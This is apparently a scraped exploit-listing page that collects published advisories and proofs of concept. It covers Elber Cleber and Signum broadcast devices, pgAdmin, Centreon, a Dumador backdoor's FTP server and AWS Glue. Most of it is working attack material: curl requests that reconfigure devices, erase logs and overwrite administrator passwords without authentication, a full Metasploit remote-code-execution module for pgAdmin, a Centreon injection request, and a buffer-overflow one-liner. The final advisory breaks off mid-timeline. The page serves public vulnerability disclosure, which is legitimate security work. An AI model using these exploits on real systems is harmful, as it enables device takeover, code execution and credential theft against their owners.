Latest exploits :: CodePwn

<pre><code> Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5817 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc. </code></pre>

<pre><code> Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5816 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd) </code></pre>

<pre><code> Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it’s possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5815 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc. </code></pre>

<pre><code> Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it’s possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5814 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd) </code></pre>

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SMB::Server::Share def initialize(info = {}) super( update_info( info, 'Name' => 'pgAdmin Session Deserialization RCE', 'Description' => %q{ pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python object to execute code within the context of the target application. This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled. Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated technique whereby a payload is uploaded. }, 'Author' => [ 'Spencer McIntyre', # metasploit module 'Davide Silvetti', # vulnerability discovery and write up 'Abdel Adim Oisfi' # vulnerability discovery and write up ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-2044'], ['URL', 'https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/'], ['URL', 'https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d'] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Payload' => {}, 'Targets' => [ [ 'Automatic', {} ], ], 'DefaultOptions' => { 'SSL' => true, 'WfsDelay' => 5 }, 'DefaultTarget' => 0, 'DisclosureDate' => '2024-03-04', # date it was patched, see: https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path for pgAdmin', '/']), OptString.new('USERNAME', [false, 'The username to authenticate with (an email address)', '']), OptString.new('PASSWORD', [false, 'The password to authenticate with', '']) ]) end def check version = get_version return CheckCode::Unknown('Unable to determine the target version') unless version return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.4') CheckCode::Appears("pgAdmin version #{version} is affected") end def csrf_token return @csrf_token if @csrf_token res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) set_csrf_token_from_login_page(res) fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token @csrf_token end def set_csrf_token_from_login_page(res) if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ @csrf_token = Regexp.last_match(1) # at some point between v7.0 and 7.7 the token format changed elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first) @csrf_token = element['value'] end end def get_version res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) return unless res&.code == 200 html_document = res.get_html_document return unless html_document.xpath('//title').text == 'pgAdmin 4' # there's multiple links in the HTML that expose the version number in the [X]XYYZZ, # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27 versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ } return unless versioned_link set_csrf_token_from_login_page(res) # store the CSRF token because we have it Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}") end def exploit if datastore['USERNAME'].present? exploit_upload else exploit_remote_load end end def exploit_remote_load start_service print_status('The SMB service has been started.') # Call the exploit primer self.file_contents = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded) trigger_deserialization(unc) end def exploit_upload res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { 'csrf_token' => csrf_token, 'email' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'language' => 'en', 'internal_button' => 'Login' } }) unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') end print_status('Successfully authenticated to pgAdmin') serialized_data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded) file_name = Faker::File.file_name(dir: '', directory_separator: '') file_manager_upload(file_name, serialized_data) trigger_deserialization("../storage/#{datastore['USERNAME'].gsub('@', '_')}/#{file_name}") file_manager_delete(file_name) end def trigger_deserialization(path) print_status("Triggering deserialization for path: #{path}") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'login'), 'cookie' => "pga4_session=#{path}!" }) end def file_manager_init res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'dialog_type' => 'storage_dialog', 'supported_types' => ['sql', 'csv', 'json', '*'], 'dialog_title' => 'Storage Manager' }.to_json }) unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction') end trans_id end def file_manager_delete(file_path) trans_id = file_manager_init res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'mode' => 'delete', 'path' => "/#{file_path}", 'storage_folder' => 'my_storage' }.to_json }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to delete file') end true end def file_manager_upload(file_path, file_contents) trans_id = file_manager_init form = Rex::MIME::Message.new form.add_part( file_contents, 'application/octet-stream', 'binary', "form-data; name=\"newfile\"; filename=\"#{file_path}\"" ) form.add_part('add', nil, nil, 'form-data; name="mode"') form.add_part('/', nil, nil, 'form-data; name="currentpath"') form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => form.to_s }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') end upload_path = res.get_json_document.dig('data', 'result', 'Name') print_status("Serialized payload uploaded to: #{upload_path}") true end end </code></pre>

<pre><code>;; Postauth SQL Injection in Centreon 23.10-1.el8 ;; by code610 ;; ;; found : 05.03.2024 ;; version: centreon-vbox-vm-23_10-1.el8.zip ;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html ;; ;; sqlmap request.txt POST /centreon/main.get.php?p=60201 HTTP/1.1 Host: 192.168.56.156 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 2529 Origin: http://192.168.56.156 Connection: keep-alive Referer: http://192.168.56.156/centreon/main.get.php?p=60201&o=a Cookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avh Upgrade-Insecure-Requests: 1 service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf ;; --- ;; init response: <a href="main.php?p=60201" class="pathWay">Services by host</a> </div> SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311 Stack trace: #0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query() #1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query() #2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence() #3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate() #4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate() #5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate() #6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...') #7 /usr/share/centreon/www/main.get.php(304): include_once('...') #8 {main} thrown in /usr/share/centreon/www/class/centreonDB.class.php on line 311 ;; --- ;; More: ;; https://code610.blogspot.com ;; https://twitter.com/CodySixteen ;; ;; cheers ;; </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Dumador.c Vulnerability: Remote Stack Buffer Overflow (SEH) Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH). Family: Dumador Type: PE32 MD5: 6cc630843cabf23621375830df474bc5 SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9 Vuln ID: MVID-2024-0679 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 04/15/2024 Memory Dump: (16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available) eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002 eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 775ced3c c21400 ret 14h 0:002> .ecxr eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194 eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 kernel32!lstrcpyA+0x1c: 74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=?? *** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe 0:002> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: kernel32!lstrcpyA+1c 74657c7c 880c16 mov byte ptr [esi+edx],cl EXCEPTION_RECORD: 0401f408 -- (.exr 0x401f408) ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000008 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 04020000 Attempt to write to address 04020000 PROCESS_NAME: Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 00000015 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 CONTEXT: 0401f458 -- (.cxr 0x401f458) eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194 eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 kernel32!lstrcpyA+0x1c: 74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=?? Resetting default scope WRITE_ADDRESS: 04020000 FOLLOWUP_IP: kernel32!lstrcpyA+1c 74657c7c 880c16 mov byte ptr [esi+edx],cl STACK_ADDR_RAW_STACK_SYMBOL: 401fa34 ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 00401bf3 to 74657c7c FAULTING_THREAD: ffffffff DEFAULT_BUCKET_ID: STACKIMMUNE PRIMARY_PROBLEM_CLASS: STACKIMMUNE BUGCHECK_STR: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE STACK_TEXT: 00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0 STACK_COMMAND: .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe FOLLOWUP_NAME: MachineOwner MODULE_NAME: unknown IMAGE_NAME: unknown DEBUG_FLR_IMAGE_TIMESTAMP: 0 FAILURE_BUCKET_ID: STACKIMMUNE_c0000409_unknown!Unloaded BUCKET_ID: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe Followup: MachineOwner --------- 0:002> !exchain 0401f2c0: ntdll!_except_handler4+0 (775d6a50) CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (776157ad) 0401f8d0: kernel32!_except_handler4+0 (7466d450) CRT scope 0, filter: kernel32!lstrcpyA+2d (74657c8d) func: kernel32!lstrcpyA+40 (74657ca0) 0401ffcc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000 220 CONNECTED ERROR ERROR ERROR Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240411-0 > ======================================================================= title: Database Passwords in Server Response product: Amazon AWS Glue vulnerable version: until 2024-02-23 fixed version: as of 2024-02-23 CVE number: - impact: medium homepage: https://aws.amazon.com/glue/ found: 2023-05-10 by: Michael Werner (Eviden) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "AWS Glue is a serverless data integration service that makes it easier to discover, prepare, move, and integrate data from multiple sources for analytics, machine learning (ML), and application development." Source: https://aws.amazon.com/glue/ Business recommendation: ------------------------ The vendor has fixed the issue in the currently available version on all instances world-wide as of 2024-02-23. Vulnerability overview/description: ----------------------------------- 1) Database Passwords in Server Response The password of database connections in AWS Glue is loaded into the website when a connection's edit page is requested. Principals with appropriate permissions can read the password. This behavior also increases the risk that database passwords will be intercepted by an attacker during transmission in the server response. Many types of vulnerabilities, such as broken access controls, cross-site scripting and weaknesses in session handling, could enable an attacker to leverage this behavior to retrieve the passwords. Proof of concept: ----------------- 1) Database Passwords in Server Response The following steps are necessary to reconstruct the vulnerability: 1. Login to the AWS Console and switch to the Glue module. 2. Go to "Data connections" and create a new connection. 3. Choose a connection type that allows username / password authentication (e.g. JDBC). <image ref: aws_glue_connection_config.webp> 4. Open the new connection's "Edit" page and inspect the password field e.g. with the browser's DevTools. <image ref: aws_glue_poc.webp> The following permissions were used: * glue:GetConnections (for the list view of connections; not necessary to open the connection page itself if the connection name is known) * glue:GetConnection (for opening the connection page) * ec2:DescribeSubnets (for opening the edit page of a connection) Permission Summary: A principal only needs the permissions glue:GetConnection and ec2:DescribeSubnets to retrieve the database password of a connection. The attacker also needs either knowledge of the connection's name to open the edit page directly (e.g. https://us-east-1.console.aws.amazon.com/gluestudio/home?region=us-east-1#/connection/edit-connection/Security%20Advisory/) or the permission glue:GetConnections to list existing connections. Vulnerable / tested versions: ----------------------------- The version that was current at 2023-05-10 has been tested and found to be vulnerable. Vendor contact timeline: ------------------------ 2023-06-07: Contacting vendor through aws-security@amazon.com 